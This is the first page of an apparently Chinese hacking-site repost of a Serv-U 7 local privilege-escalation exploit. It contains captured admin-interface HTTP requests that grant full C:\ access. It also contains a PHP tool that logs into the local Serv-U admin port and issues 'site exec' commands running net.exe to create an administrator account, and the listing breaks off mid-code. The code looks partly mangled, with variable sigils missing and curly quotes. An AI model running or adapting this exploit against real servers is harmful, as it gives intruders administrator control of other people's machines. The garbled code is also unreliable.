圣剑安全网
新闻 业内 站内 漏洞 病毒 科技 骗术 励志 军事文章 电脑 网络 入门 检测 攻防 编程 人物 提权 ┊ 网站导航
软件 安全 扫描 加密 检测 远控  Q Q 嗅探 综合动画  Q Q 程序 检测 破解 脚本 其他 漏洞 原创 ┊ 圣剑之家
源码 ASP  PHP  JSP  .NET 模板 V B  V C  JAVA书籍 编程 系统 网管 图像 网页 数据 杂志 其他 ┊ 圣剑论坛
学院 网络 软件 破解 检测 安全 设计 编程 攻防会员 高级资源下载 会员活动 会员特权 会员论坛     ┊ 圣剑商城
·圣剑内网通 打造2011内网上线神话! ·加入本站VIP 好礼送不断! 关键词: 关键词:黑客┊抓鸡
文章中心首页 | 业内新闻 | 站内事件 | 漏洞公告 | 病毒公告 | 科技新闻 | 骗术 | 励志 | 军事
 您现在的位置: 圣剑安全网 >> 新闻资讯 >> 漏洞公告 >> 新闻信息

Serv-U 7 Local Exp 本地溢出提权

作者:佚名 新闻来源:本站整理 更新时间:2009-7-16 0:21:00

<?
/*
    serv-u 7 local exp ver 1.0
    www.inbreak.net
    author kxlzx@xiaotou.org 2008-11-19
    modify 2008-11-20     
*/
/*
下面是用到的主要数据包,给大家研究用。如果你用asp等语言再写一次,可以参考。
Global user list:
GET /Admin/XML/OrganizationUsers.xml&ID=161&sync=1227078625078&ForceList=1 HTTP/1.1
Accept: 
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: 127.0.0.1:43958
Connection: Keep-Alive
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; 
killmenothing; 
Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25

787a8544280754
581406246bf8

Global c:\|RWADNELCRNI:
POST /Admin/XML/Result.xml?Command=AddObject&Object=CServer.0.DirAccess&Sync=1227081261640 HTTP/1.1
Accept: 
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerDir.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false

; killmenothing;

 Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25

787a854428075

4581406246bf8

Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

this user c:\|RWADNELCRNI:
POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.618060.DirAccess&Sync=1227081437828 HTTP/1.1
Accept: 
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false;

 killmenothing;

 Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25

787a854428075

4581406246bf8

Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

------------------------------不足之处---------------
期待大家美化这个工具
对su的设置环境要求太多
请大家在这里填写。。

*/    
?>
<html>
    <title>Serv-u 7 local exp ver 1.0 by kxlzx</title>
    <body>
    <script>
    function fun_showDiv(show)
    {
        document.getElementById(show).style.display="block";
    }
    </script>
    <b>Serv-u 7 local exp ver 1.0 by kxlzx</b>
        <form id="form1" name="form1" method="post" action="?">
                <p><a href="#" onclick="fun_showDiv(’adminpassdiv’)">管理员密码</a>
                  <input type="text" name="admin_pwd" value="" />
              </p>
              <p>直接提权!
                  <input type="submit" name="cmd" value="提权" />  
                <a href="#" onclick="fun_showDiv(’QAdiv’)">QA</a>
              </p>
              <pre>

<?

//Global var
    port=43958;
    host="127.0.0.1";
    sessionid="";
    getuserid="";
    ftpport=21;
    ftpuser="kxlzx_hacked";
    ftppwd=_POST[’admin_pwd’];
    exec_addUser="site exec c:/windows/system32/net.exe user ".ftpuser." ".ftppwd." /add";
    exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".ftpuser.

"  /add";

if(_POST[’cmd’]) {

//login-----------------------------------------
    sock_login = fsockopen(host, port);
    URL=’/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543’;
    post_data_login[’user’] = "";
    post_data_login[’pword’] = ftppwd;
    post_data_login[’language’] = "zh%2CCN&";
    ref="http://".host.":".port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
    postStr = createRequest(port,host,URL,post_data_login,sessionid,ref);
    fputs(sock_login, postStr);
    result = fread(sock_login, 1280);    
    sessionid = getmidstr("<sessionid>","</sessionid>",result);
    if (sessionid!="")
        echo "登陆成功!\r\n";
    fclose(sock_login);
//login-----------------------------------------

//getOrganizationId-------------------------------
    OrganizationId="";
    sock_OrganizationId = fsockopen(host, port);
    URL=’/Admin/ServerUsers.htm?Page=1’;
    postStr = createRequest(port,host,URL,"",sessionid,"");
    fputs(sock_OrganizationId, postStr);
    resultOrganizationId="";
    while(!feof(sock_OrganizationId)) {
        result = fread(sock_OrganizationId, 1024);    
        resultOrganizationId=resultOrganizationId.result;
    }
    strTmp = "OrganizationUsers.xml&ID=";
    OrganizationId = substr(resultOrganizationId,strpos(resultOrganizationId,strTmp)+strlen(strTmp),strlen(strTmp)+15);
    OrganizationId = substr(OrganizationId,0,strpos(OrganizationId,"\""));
    fclose(sock_OrganizationId);
    if (OrganizationId!="")
        echo "获取OrganizationId".OrganizationId."成功!\r\n";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
    getuserid="";
    sock_getuserid = fsockopen(host, port);
    URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".OrganizationId.".User&Temp=1&Sync=5466

66666666666663";
    ref="http://".host.":".port."/Admin/ServerUsers.htm?Page=1";
    post_data_getuserid="";
    postStr = createRequest(port,host,URL

[1] [2] [3]  下一页

 
  • 上一个新闻:关于圣剑2月份被黑说明及处理
  • 下一个新闻:Safari 4.0.2版本修复多个安全漏洞
    • 】【关闭窗口
    最新新闻
    热门新闻
    推荐新闻
    关于我们 | 联系我们 | 广告合作 | 免责声明 | 网站地图 | 欢迎投稿
    中华人民共和国信息产业部网站备案编号:苏ICP备06029591号
    Copyright 圣剑网络 2006-2010 版权所有 All Rights Reserved
    本站内容来自于互联网,仅供用于网络安全技术学习,学习中请遵循相关法律法规.